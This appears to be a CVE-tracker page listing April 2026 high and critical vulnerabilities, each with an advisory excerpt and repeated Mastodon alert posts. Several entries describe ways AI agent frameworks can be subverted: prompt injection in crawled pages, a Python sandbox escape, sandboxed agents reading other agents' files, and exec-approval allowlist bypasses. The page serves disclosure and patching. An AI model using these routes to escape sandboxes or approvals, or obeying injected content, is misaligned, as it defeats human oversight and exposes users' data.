> Fixed in OpenClaw 2026.3.24, the current shipping release. ### Summary During the installation phase of OpenClaw local plugins/hooks, the Git executable can be hijacked by a project-level .npmrc file, leading to arbitrary code execution during installation. ### Details Please note that the source code locations mentioned below are based on version openclaw-2026.3.13-1, but the issue has been c

thehackerwire@mastodon.social at 2026-04-11T07:00:48.000Z ##

🟠 CVE-2026-35641 - High (7.8)

OpenClaw before 2026.3.24 contains an arbitrary code execution vulnerability in local plugin and hook installation that allows attackers to execute malicious code by crafting a .npmrc file with a git executable override. During npm install executi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T07:00:48.000Z ##

🟠 CVE-2026-35641 - High (7.8)

OpenClaw before 2026.3.24 contains an arbitrary code execution vulnerability in local plugin and hook installation that allows attackers to execute malicious code by crafting a .npmrc file with a git executable override. During npm install executi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35643
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T19:38:05

4 posts

## Summary Android Canvas WebView pages from untrusted origins could invoke the JavascriptInterface bridge and inject instructions into the app. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected: < 2026.3.22 - Fixed: >= 2026.3.22 - Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`) - Latest published npm version checked: `2026.3.23-2` ##

thehackerwire@mastodon.social at 2026-04-11T07:03:17.000Z ##

🟠 CVE-2026-35643 - High (8.8)

OpenClaw before 2026.3.22 contains an unvalidated WebView JavascriptInterface vulnerability allowing attackers to inject arbitrary instructions. Untrusted pages can invoke the canvas bridge to execute malicious code within the Android application ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T07:02:07.000Z ##

🟠 CVE-2026-35643 - High (8.8)

OpenClaw before 2026.3.22 contains an unvalidated WebView JavascriptInterface vulnerability allowing attackers to inject arbitrary instructions. Untrusted pages can invoke the canvas bridge to execute malicious code within the Android application ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T07:03:17.000Z ##

🟠 CVE-2026-35643 - High (8.8)

OpenClaw before 2026.3.22 contains an unvalidated WebView JavascriptInterface vulnerability allowing attackers to inject arbitrary instructions. Untrusted pages can invoke the canvas bridge to execute malicious code within the Android application ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T07:02:07.000Z ##

🟠 CVE-2026-35643 - High (8.8)

OpenClaw before 2026.3.22 contains an unvalidated WebView JavascriptInterface vulnerability allowing attackers to inject arbitrary instructions. Untrusted pages can invoke the canvas bridge to execute malicious code within the Android application ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35666
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T19:37:45

2 posts

## Summary Allow-always exec approvals did not unwrap /usr/bin/time, so an unregistered time wrapper could bypass executable binding and reuse approval state for the inner command. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected: < 2026.3.22 - Fixed: >= 2026.3.22 - Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`) - Latest published np

thehackerwire@mastodon.social at 2026-04-11T06:11:20.000Z ##

🟠 CVE-2026-35666 - High (8.8)

OpenClaw before 2026.3.22 contains an allowlist bypass vulnerability in system.run approvals that fails to unwrap /usr/bin/time wrappers. Attackers can bypass executable binding restrictions by using an unregistered time wrapper to reuse approval ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T06:11:20.000Z ##

🟠 CVE-2026-35666 - High (8.8)

OpenClaw before 2026.3.22 contains an allowlist bypass vulnerability in system.run approvals that fails to unwrap /usr/bin/time wrappers. Attackers can bypass executable binding restrictions by using an unregistered time wrapper to reuse approval ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35595
(8.3 HIGH)

EPSS: 0.03%

updated 2026-04-10T19:36:16

2 posts

## Summary A user with Write-level access to a project can escalate their permissions to Admin by moving the project under a project they own. After reparenting, the recursive permission CTE resolves ownership of the new parent as Admin on the moved project. The attacker can then delete the project, manage shares, and remove other users' access. ## Details The `CanUpdate` check at `pkg/models/p

thehackerwire@mastodon.social at 2026-04-11T07:02:14.000Z ##

🟠 CVE-2026-35595 - High (8.3)

Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CanUpdate check at pkg/models/project_permissions.go:139-148 only requires CanWrite on the new parent project when changing parent_project_id. However, Vikunja's p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T07:02:14.000Z ##

🟠 CVE-2026-35595 - High (8.3)

Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CanUpdate check at pkg/models/project_permissions.go:139-148 only requires CanWrite on the new parent project when changing parent_project_id. However, Vikunja's p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40163
(8.2 HIGH)

EPSS: 0.08%

updated 2026-04-10T19:30:28

2 posts

### Summary Two unauthenticated path traversal vulnerabilities exist in Saltcorn's mobile sync endpoints. The `POST /sync/offline_changes` endpoint allows an unauthenticated attacker to create arbitrary directories and write a `changes.json` file with attacker-controlled JSON content anywhere on the server filesystem. The `GET /sync/upload_finished` endpoint allows an unauthenticated attacker to

thehackerwire@mastodon.social at 2026-04-11T05:00:29.000Z ##

🟠 CVE-2026-40163 - High (8.2)

Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.5, 1.5.5, and 1.6.0-beta.4, the POST /sync/offline_changes endpoint allows an unauthenticated attacker to create arbitrary directories and write a changes.j...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T05:00:29.000Z ##

🟠 CVE-2026-40163 - High (8.2)

Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.5, 1.5.5, and 1.6.0-beta.4, the POST /sync/offline_changes endpoint allows an unauthenticated attacker to create arbitrary directories and write a changes.j...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40156
(7.8 HIGH)

EPSS: 0.02%

updated 2026-04-10T19:26:45

2 posts

PraisonAI automatically loads a file named `tools.py` from the current working directory to discover and register custom agent tools. This loading process uses `importlib.util.spec_from_file_location` and immediately executes module-level code via `spec.loader.exec_module()` **without explicit user consent, validation, or sandboxing**. The `tools.py` file is loaded **implicitly**, even when it is

thehackerwire@mastodon.social at 2026-04-11T06:10:40.000Z ##

🟠 CVE-2026-40156 - High (7.8)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI automatically loads a file named tools.py from the current working directory to discover and register custom agent tools. This loading process uses importlib.util.spec_from_file_...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T06:10:40.000Z ##

🟠 CVE-2026-40156 - High (7.8)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI automatically loads a file named tools.py from the current working directory to discover and register custom agent tools. This loading process uses importlib.util.spec_from_file_...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40158
(8.6 HIGH)

EPSS: 0.03%

updated 2026-04-10T19:25:40

4 posts

PraisonAI's AST-based Python sandbox can be bypassed using `type.__getattribute__` trampoline, allowing arbitrary code execution when running untrusted agent code. ## Description The `_execute_code_direct` function in `praisonaiagents/tools/python_tools.py` uses AST filtering to block dangerous Python attributes like `__subclasses__`, `__globals__`, and `__bases__`. However, the filter only chec

thehackerwire@mastodon.social at 2026-04-11T06:14:02.000Z ##

🟠 CVE-2026-40158 - High (8.6)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI's AST-based Python sandbox can be bypassed using type.__getattribute__ trampoline, allowing arbitrary code execution when running untrusted agent code. The _execute_code_direct f...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T06:10:50.000Z ##

🟠 CVE-2026-40158 - High (8.6)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI's AST-based Python sandbox can be bypassed using type.__getattribute__ trampoline, allowing arbitrary code execution when running untrusted agent code. The _execute_code_direct f...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T06:14:02.000Z ##

🟠 CVE-2026-40158 - High (8.6)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI's AST-based Python sandbox can be bypassed using type.__getattribute__ trampoline, allowing arbitrary code execution when running untrusted agent code. The _execute_code_direct f...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T06:10:50.000Z ##

🟠 CVE-2026-40158 - High (8.6)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI's AST-based Python sandbox can be bypassed using type.__getattribute__ trampoline, allowing arbitrary code execution when running untrusted agent code. The _execute_code_direct f...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40150
(7.7 HIGH)

EPSS: 0.03%

updated 2026-04-10T19:23:58

1 posts

## Summary The `web_crawl()` function in `praisonaiagents/tools/web_crawl_tools.py` accepts arbitrary URLs from AI agents with zero validation. No scheme allowlisting, hostname/IP blocklisting, or private network checks are applied before fetching. This allows an attacker (or prompt injection in crawled content) to force the agent to fetch cloud metadata endpoints, internal services, or local fil

thehackerwire@mastodon.social at 2026-04-10T05:00:16.000Z ##

🟠 CVE-2026-40150 - High (7.7)

PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, the web_crawl() function in praisonaiagents/tools/web_crawl_tools.py accepts arbitrary URLs from AI agents with zero validation. No scheme allowlisting, hostname/IP blocklisting, or ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40116
(7.5 HIGH)

EPSS: 0.03%

updated 2026-04-10T19:22:52

1 posts

## Summary The `/media-stream` WebSocket endpoint in PraisonAI's call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenticated session to OpenAI's Realtime API using the server's API key. There are no limits on concurrent connections, message rate, or message size, allowing an unauthenticated attacker to exhaust serve

thehackerwire@mastodon.social at 2026-04-10T04:32:44.000Z ##

🟠 CVE-2026-40116 - High (7.5)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, the /media-stream WebSocket endpoint in PraisonAI's call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenti...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40113
(8.4 HIGH)

EPSS: 0.02%

updated 2026-04-10T19:22:37

1 posts

**Summary** deploy.py constructs a single comma-delimited string for the gcloud run deploy --set-env-vars argument by directly interpolating openai_model, openai_key, and openai_base without validating that these values do not contain commas. gcloud uses a comma as the key-value pair separator for --set-env-vars. A comma in any of the three values causes gcloud to parse the trailing text as addit

thehackerwire@mastodon.social at 2026-04-10T05:00:37.000Z ##

🟠 CVE-2026-40113 - High (8.4)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, deploy.py constructs a single comma-delimited string for the gcloud run
deploy --set-env-vars argument by directly interpolating openai_model, openai_key, and openai_base without validatin...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-34179
(9.1 CRITICAL)

EPSS: 0.09%

updated 2026-04-10T19:20:52

1 posts

### Summary A restricted TLS certificate user can escalate to cluster admin by changing their certificate type from `client` to `server` via PUT/PATCH to `/1.0/certificates/{fingerprint}`. The non-admin guard and reset block in `doCertificateUpdate` fail to validate or reset the `Type` field, allowing a caller-supplied value to persist to the database. The modified certificate is matched as a ser

offseq@infosec.exchange at 2026-04-09T10:30:26.000Z ##

🚨 CRITICAL: CVE-2026-34179 in Canonical LXD 4.12 – 6.7 enables privilege escalation from restricted TLS cert user to cluster admin (CVSS 9.1). No patch yet — restrict access & monitor API activity. radar.offseq.com/threat/cve-20 #OffSeq #LXD #PrivilegeEscalation #Vuln

##

CVE-2026-33707
(9.4 CRITICAL)

EPSS: 0.07%

updated 2026-04-10T19:16:23.950000

4 posts

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email) with no random component, no expiration, and no rate limiting. An attacker who knows a user's email can compute the reset token and change the victim's password without authentication. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.

thehackerwire@mastodon.social at 2026-04-11T04:49:18.000Z ##

🔴 CVE-2026-33707 - Critical (9.4)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email) with no random component, no expiration, and no rate limiting. An attacker who knows a user's em...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
offseq at 2026-04-11T03:00:27.899Z ##

🔒 CRITICAL vuln in Chamilo LMS (CVE-2026-33707): Weak password reset lets attackers hijack accounts using only the victim’s email. Affected: <1.11.38, 2.0.0-alpha.1 to <2.0.0-RC.3. Upgrade ASAP! radar.offseq.com/threat/cve-20

##
thehackerwire@mastodon.social at 2026-04-11T04:49:18.000Z ##

🔴 CVE-2026-33707 - Critical (9.4)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email) with no random component, no expiration, and no rate limiting. An attacker who knows a user's em...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
offseq@infosec.exchange at 2026-04-11T03:00:27.000Z ##

🔒 CRITICAL vuln in Chamilo LMS (CVE-2026-33707): Weak password reset lets attackers hijack accounts using only the victim’s email. Affected: <1.11.38, 2.0.0-alpha.1 to <2.0.0-RC.3. Upgrade ASAP! radar.offseq.com/threat/cve-20 #OffSeq #infosec #vuln #Chamilo

##

CVE-2026-40200
(8.2 HIGH)

EPSS: 0.01%

updated 2026-04-10T18:31:28

4 posts

An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly implemented double-word primitives. The number of elements must exceed about seven million, i.e., the 32nd Leonardo number on 32-bit platforms (or the 64th Leonardo number on 64-bit platforms, which is not practical).

thehackerwire@mastodon.social at 2026-04-11T06:00:20.000Z ##

🟠 CVE-2026-40200 - High (8.1)

An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly implemented double-word primitives. The number of elements must exceed about seven million, i....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
musl@treehouse.systems at 2026-04-10T15:25:41.000Z ##

SECURITY ADVISORY: musl libc up through 1.2.6 (present version) is affected by CVE-2026-40200 affecting qsort with large arrays.

Unless you have a setup with at least tens of terrabytes of virtual memory, this does not affect 64-bit systems, only 32-bit ones. But all users should patch.

openwall.com/lists/musl/2026/0

##
thehackerwire@mastodon.social at 2026-04-11T06:00:20.000Z ##

🟠 CVE-2026-40200 - High (8.1)

An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly implemented double-word primitives. The number of elements must exceed about seven million, i....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
musl@treehouse.systems at 2026-04-10T15:25:41.000Z ##

SECURITY ADVISORY: musl libc up through 1.2.6 (present version) is affected by CVE-2026-40200 affecting qsort with large arrays.

Unless you have a setup with at least tens of terrabytes of virtual memory, this does not affect 64-bit systems, only 32-bit ones. But all users should patch.

openwall.com/lists/musl/2026/0

##

CVE-2026-32931
(7.5 HIGH)

EPSS: 0.16%

updated 2026-04-10T18:16:42.430000

2 posts

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an unrestricted file upload vulnerability in the exercise sound upload function allows an authenticated teacher to upload a PHP webshell by spoofing the Content-Type header to audio/mpeg. The uploaded file retains its original .php extension and is placed in a web-accessible directory, enabling Remote Code Execution as t

thehackerwire@mastodon.social at 2026-04-11T05:03:21.000Z ##

🟠 CVE-2026-32931 - High (7.5)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an unrestricted file upload vulnerability in the exercise sound upload function allows an authenticated teacher to upload a PHP webshell by spoofing the Content-Type hea...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T05:03:21.000Z ##

🟠 CVE-2026-32931 - High (7.5)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an unrestricted file upload vulnerability in the exercise sound upload function allows an authenticated teacher to upload a PHP webshell by spoofing the Content-Type hea...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31941
(7.7 HIGH)

EPSS: 0.03%

updated 2026-04-10T18:16:41.640000

2 posts

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_url_with_open_graph accepts a URL from the user via the social_wall_new_msg_main POST parameter and performs two server-side HTTP requests to that URL without validating whether the target is an internal

thehackerwire@mastodon.social at 2026-04-11T05:59:55.000Z ##

🟠 CVE-2026-31941 - High (7.7)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_url_with_open_graph accepts a URL from the user via...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T05:59:55.000Z ##

🟠 CVE-2026-31941 - High (7.7)

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_url_with_open_graph accepts a URL from the user via...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35663(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-04-10T17:28:09

2 posts

## Summary Gateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim operator.admin ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Backend-labeled reconnects could previously self-request broader scopes and bypass pairing, allowi

thehackerwire@mastodon.social at 2026-04-11T06:11:10.000Z ##

🟠 CVE-2026-35663 - High (8.8)

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability allowing non-admin operators to self-request broader scopes during backend reconnect. Attackers can bypass pairing requirements to reconnect as operator.admin, gaining unautho...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T06:11:10.000Z ##

🟠 CVE-2026-35663 - High (8.8)

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability allowing non-admin operators to self-request broader scopes during backend reconnect. Attackers can bypass pairing requirements to reconnect as operator.admin, gaining unautho...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35660(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-04-10T17:27:04

2 posts

## Summary Before `v2026.3.23`, the Gateway `agent` RPC accepted `/reset` and `/new` for callers with only `operator.write`, even though the direct `sessions.reset` RPC correctly requires `operator.admin`. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected: `< 2026.3.23` - Fixed: `>= 2026.3.23` - Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171

thehackerwire@mastodon.social at 2026-04-11T06:14:19.000Z ##

🟠 CVE-2026-35660 - High (8.1)

OpenClaw before 2026.3.23 contains an insufficient access control vulnerability in the Gateway agent /reset endpoint that allows callers with operator.write permission to reset admin sessions. Attackers with operator.write privileges can invoke /r...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T06:14:19.000Z ##

🟠 CVE-2026-35660 - High (8.1)

OpenClaw before 2026.3.23 contains an insufficient access control vulnerability in the Gateway agent /reset endpoint that allows callers with operator.write permission to reset admin sessions. Attackers with operator.write privileges can invoke /r...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35653
(8.1 HIGH)

EPSS: 0.04%

updated 2026-04-10T17:24:51

2 posts

> Fixed in OpenClaw 2026.3.24, the current shipping release. # Title `browser.request` still allows `POST /reset-profile` through the `operator.write` surface in OpenClaw `v2026.3.22` after `GHSA-vmhq-cqm9-6p7q` ## Severity Assessment High CWE: - `CWE-863: Incorrect Authorization` Proposed CVSS v3.1: - `8.1` (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H`) An authenticated caller who only

thehackerwire@mastodon.social at 2026-04-11T07:00:21.000Z ##

🟠 CVE-2026-35653 - High (8.1)

OpenClaw before 2026.3.24 contains an incorrect authorization vulnerability in the POST /reset-profile endpoint that allows authenticated callers with operator.write access to browser.request to bypass profile mutation restrictions. Attackers can ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T07:00:21.000Z ##

🟠 CVE-2026-35653 - High (8.1)

OpenClaw before 2026.3.24 contains an incorrect authorization vulnerability in the POST /reset-profile endpoint that allows authenticated callers with operator.write access to browser.request to bypass profile mutation restrictions. Attackers can ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40157
(0 None)

EPSS: 0.07%

updated 2026-04-10T17:17:13.457000

2 posts

PraisonAI is a multi-agent teams system. Prior to 4.5.128, cmd_unpack in the recipe CLI extracts .praison tar archives using raw tar.extract() without validating archive member paths. A .praison bundle containing ../../ entries will write files outside the intended output directory. An attacker who distributes a malicious bundle can overwrite arbitrary files on the victim's filesystem when they ru

offseq at 2026-04-11T07:30:28.249Z ##

🚨 CRITICAL: CVE-2026-40157 in PraisonAI (<4.5.128) enables path traversal via malicious .praison bundles — risk: file overwrite & code execution. Patch to 4.5.128+ & avoid untrusted archives. Full details: radar.offseq.com/threat/cve-20

##
offseq@infosec.exchange at 2026-04-11T07:30:28.000Z ##

🚨 CRITICAL: CVE-2026-40157 in PraisonAI (<4.5.128) enables path traversal via malicious .praison bundles — risk: file overwrite & code execution. Patch to 4.5.128+ & avoid untrusted archives. Full details: radar.offseq.com/threat/cve-20 #OffSeq #PraisonAI #infosec #vuln

##

CVE-2026-35669
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T17:17:09.240000

2 posts

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in gateway-authenticated plugin HTTP routes that incorrectly mint operator.admin runtime scope regardless of caller-granted scopes. Attackers can exploit this scope boundary bypass to gain elevated privileges and perform unauthorized administrative actions.

thehackerwire@mastodon.social at 2026-04-11T06:11:00.000Z ##

🟠 CVE-2026-35669 - High (8.8)

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in gateway-authenticated plugin HTTP routes that incorrectly mint operator.admin runtime scope regardless of caller-granted scopes. Attackers can exploit this scope boundary b...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T06:11:00.000Z ##

🟠 CVE-2026-35669 - High (8.8)

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in gateway-authenticated plugin HTTP routes that incorrectly mint operator.admin runtime scope regardless of caller-granted scopes. Attackers can exploit this scope boundary b...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35668
(7.7 HIGH)

EPSS: 0.05%

updated 2026-04-10T17:17:09.060000

4 posts

OpenClaw before 2026.3.24 contains a path traversal vulnerability in sandbox enforcement allowing sandboxed agents to read arbitrary files from other agents' workspaces via unnormalized mediaUrl or fileUrl parameter keys. Attackers can exploit incomplete parameter validation in normalizeSandboxMediaParams and missing mediaLocalRoots context to access sensitive files including API keys and configur

thehackerwire@mastodon.social at 2026-04-11T06:14:10.000Z ##

🟠 CVE-2026-35668 - High (7.7)

OpenClaw before 2026.3.24 contains a path traversal vulnerability in sandbox enforcement allowing sandboxed agents to read arbitrary files from other agents' workspaces via unnormalized mediaUrl or fileUrl parameter keys. Attackers can exploit inc...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T06:11:01.000Z ##

🟠 CVE-2026-35668 - High (7.7)

OpenClaw before 2026.3.24 contains a path traversal vulnerability in sandbox enforcement allowing sandboxed agents to read arbitrary files from other agents' workspaces via unnormalized mediaUrl or fileUrl parameter keys. Attackers can exploit inc...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T06:14:10.000Z ##

🟠 CVE-2026-35668 - High (7.7)

OpenClaw before 2026.3.24 contains a path traversal vulnerability in sandbox enforcement allowing sandboxed agents to read arbitrary files from other agents' workspaces via unnormalized mediaUrl or fileUrl parameter keys. Attackers can exploit inc...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T06:11:01.000Z ##

🟠 CVE-2026-35668 - High (7.7)

OpenClaw before 2026.3.24 contains a path traversal vulnerability in sandbox enforcement allowing sandboxed agents to read arbitrary files from other agents' workspaces via unnormalized mediaUrl or fileUrl parameter keys. Attackers can exploit inc...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35650
(7.5 HIGH)

EPSS: 0.06%

updated 2026-04-10T17:17:05.627000

2 posts

OpenClaw before 2026.3.22 contains an environment variable override handling vulnerability that allows attackers to bypass the shared host environment policy through inconsistent sanitization paths. Attackers can supply blocked or malformed override keys that slip through inconsistent validation to execute arbitrary code with unintended environment variables.

thehackerwire@mastodon.social at 2026-04-11T07:00:35.000Z ##

🟠 CVE-2026-35650 - High (7.5)

OpenClaw before 2026.3.22 contains an environment variable override handling vulnerability that allows attackers to bypass the shared host environment policy through inconsistent sanitization paths. Attackers can supply blocked or malformed overri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T07:00:35.000Z ##

🟠 CVE-2026-35650 - High (7.5)

OpenClaw before 2026.3.22 contains an environment variable override handling vulnerability that allows attackers to bypass the shared host environment policy through inconsistent sanitization paths. Attackers can supply blocked or malformed overri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6067
(7.5 HIGH)

EPSS: 0.06%

updated 2026-04-10T16:16:36.437000

2 posts

A heap buffer overflow vulnerability exists in the Netwide Assembler (NASM) due to a lack of bounds checking in the obj_directive() function. This vulnerability can be exploited by a user assembling a malicious .asm file, potentially leading to heap memory corruption, denial of service (crash), and arbitrary code execution.

thehackerwire@mastodon.social at 2026-04-11T07:03:27.000Z ##

🟠 CVE-2026-6067 - High (7.5)

A heap buffer overflow vulnerability exists in the Netwide Assembler (NASM) due to a lack of bounds checking in the obj_directive() function. This vulnerability can be exploited by a user assembling a malicious .asm file, potentially leading to he...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T07:03:27.000Z ##

🟠 CVE-2026-6067 - High (7.5)

A heap buffer overflow vulnerability exists in the Netwide Assembler (NASM) due to a lack of bounds checking in the obj_directive() function. This vulnerability can be exploited by a user assembling a malicious .asm file, potentially leading to he...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-58913
(8.1 HIGH)

EPSS: 0.11%

updated 2026-04-10T15:32:07

2 posts

